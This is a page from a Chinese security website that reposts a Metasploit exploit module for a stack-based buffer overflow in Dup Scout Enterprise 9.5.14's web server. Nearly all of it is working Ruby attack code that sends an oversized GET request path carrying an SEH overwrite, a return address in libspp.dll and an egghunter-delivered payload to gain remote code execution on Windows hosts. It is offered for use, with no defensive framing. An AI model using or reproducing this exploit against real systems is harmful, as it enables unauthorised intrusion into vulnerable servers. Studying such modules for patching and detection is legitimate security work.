首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Dup Scout Enterprise 9.5.14 - GET Buffer Overflow (Metasploit) 来源：metasploit.com 作者：Teixeira 发布时间：2017-05-18   ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require 'msf/core'   class MetasploitModule < Msf::Exploit::Remote   Rank = GreatRanking     include Msf::Exploit::Remote::Seh   include Msf::Exploit::Remote::Egghunter   include Msf::Exploit::Remote::HttpClient     def initialize(info = {})     super(update_info(info,       'Name'           => 'Dup Scout Enterprise GET Buffer Overflow',       'Description'    => %q{         This module exploits a stack-based buffer overflow vulnerability         in the web interface of Dup Scout Enterprise v9.5.14, caused by         improper bounds checking of the request path in HTTP GET requests         sent to the built-in web server. This module has been tested         successfully on Windows 7 SP1 x86.       },       'License'        => MSF_LICENSE,       'Author'         =>         [           'vportal',         # Vulnerability discovery and PoC           'Daniel Teixeira'  # Metasploit module         ],       'DefaultOptions' =>         {           'EXITFUNC' => 'thread'         },       'Platform'       => 'win',       'Payload'        =>         {           'BadChars'   => "\x00\x09\x0a\x0d\x20\x26",           'Space'      => 500         },       'Targets'        =>         [           [ 'Dup Scout Enterprise v9.5.14',             {               'Offset' => 2488,               'Ret'    => 0x10050ff3  # POP # POP # RET [libspp.dll]             }           ]         ],       'Privileged'     => true,       'DisclosureDate' => 'Mar 15 2017',       'DefaultTarget'  => 0))   end     def check     res = send_request_cgi(       'method' => 'GET',       'uri'    => '/'     )       if res && res.code == 200       version = res.body[/Dup Scout Enterprise v[^<]*/]       if version         vprint_status("Version detected: #{version}")         if version =~ /9\.5\.14/           return Exploit::CheckCode::Appears         end         return Exploit::CheckCode::Detected       end     else       vprint_error('Unable to determine due to a HTTP connection timeout')       return Exploit::CheckCode::Unknown     end       Exploit::CheckCode::Safe   end     def exploit       eggoptions = {       checksum: true,       eggtag: rand_text_alpha(4, payload_badchars)     }       hunter, egg = generate_egghunter(       payload.encoded,       payload_badchars,       eggoptions     )       sploit =  rand_text_alpha(target['Offset'])     sploit << generate_seh_record(target.ret)     sploit << hunter     sploit << make_nops(10)     sploit << egg     sploit << rand_text_alpha(5500)       print_status('Sending request...')       send_request_cgi(       'method' => 'GET',       'uri'    => sploit     )   end end   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·MS17-010 EternalBlue SMB Remot ·Serviio Media Server - checkSt ·Microsoft Windows - COM Aggreg ·WordPress PHPMailer 4.6 - Host ·Apple iOS < 10.3.2 - Notificat ·BuilderEngine 3.5.0 - Arbitrar ·Mozilla Firefox 55 Denial Of S ·Oracle PeopleSoft - XML Extern ·MobaXtrem 10.2 Remote Code Exe ·Microsoft Windows Windows 8/20 ·LabF nfsAxe 3.7 FTP Client - B ·Microsoft Windows Windows 7/20   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved